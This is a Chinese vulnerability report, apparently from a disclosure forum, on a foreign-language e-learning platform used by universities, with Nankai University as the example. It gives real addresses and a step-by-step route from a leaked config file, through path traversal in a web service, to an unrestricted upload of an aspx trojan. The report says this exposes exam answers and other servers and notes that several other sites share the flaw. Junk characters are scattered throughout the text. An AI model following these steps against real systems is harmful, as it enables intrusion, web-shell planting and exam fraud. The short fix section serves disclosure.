好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中4 Z# {' f0 J$ ^+ l
" ^$ k& Q% ~( P4 X4 N1 e: @
详细说明:" y: `; N s0 E# s7 N% M
: H; u+ f2 o, Y* Y- y9 L' a$ l7 X3 T以南开大学的为例: ( L2 Q4 O$ v4 ^' G4 h+ B( n
http://222.30.60.3/NPELS; Y% C5 B' ]0 S# E
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
% I* y- R7 j/ d; }<setting name="Update_CommonSvr_CommonService" serializeAs="String"># h; `8 [) D! u; c
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
- i& c q7 S0 W) v1 O+ A</setting>
! g+ `9 H/ y: n- @* l及版本号
7 `. \/ ]9 |( b* H" C<add key="TVersion" value="1, 0, 0, 2187">
) `6 {- P. _9 B4 a- s</add>
% f4 t% [! @, I$ Q+ {4 ]" B直接访问0 @2 g& l" G2 M% ^& U# ~2 |3 ^
http://222.30.60.3/NPELS/CommonService.asmx
9 k1 z5 V, ~2 W( D$ m使用GetTestClientFileList操作,直接 HTTP GET 列目录:) b* O7 K0 F6 G. ?' I0 r
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21872 J9 H1 a8 R- g: D
进一步列目录(返回的网页很大,可以直接 wget 下来) F. h3 z4 p2 c! I o
http://222.30.60.3/NPELS/CommonS ... List?version=../../
! w5 }# j' m7 L % }: C$ K! x! ]
发现' j& z/ ^! p$ F# w1 r# m
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm$ t7 f w& B- g* H3 Q7 V4 F
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
% V, ?1 ]$ I( G上传后继续列目录找到木马地址直接访问即可" A& o$ H) B. ~4 ` Q' i
6 _9 {8 N( ?2 p) K, M5 X" r& l
OOXX
4 f) L) V p# F& X* E% B( Z 3 N% v6 C- u9 S% d# a
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法9 R; R. e( F0 s; r; M
漏洞证明:
; q1 ]% \1 R! z! W" r8 G6 S
6 _: [& s$ C' i$ r6 P! h1 ~, ^- A列目录:" ?6 t( l9 }9 L% F
http://222.30.60.3/NPELS/CommonS ... List?version=../../
3 ^8 X0 ~1 x' c文件上传:/ ^( Q% S/ ~& m+ b4 b( U+ c
http://222.30.60.3/npelsv/editor/editor.htm
4 R" s! a9 t$ A2 i
' A2 u5 l) R9 ^! Q上传木马:
+ c; V! Q6 j8 Ehttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
6 c. w/ W& O4 E/ T + ]+ M _3 y I7 ]5 f
修复方案:0 ~3 z6 g3 ]; ?. s8 J
好像考试系统必须使用 CommonService.asmx
& @5 H; o# C7 ~1 _5 A; n最好配置文件加密或者用别的方式不让它泄露出来
" P3 k* X# e, V, p0 X并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
' v# D2 [, I0 { \; C7 J" x |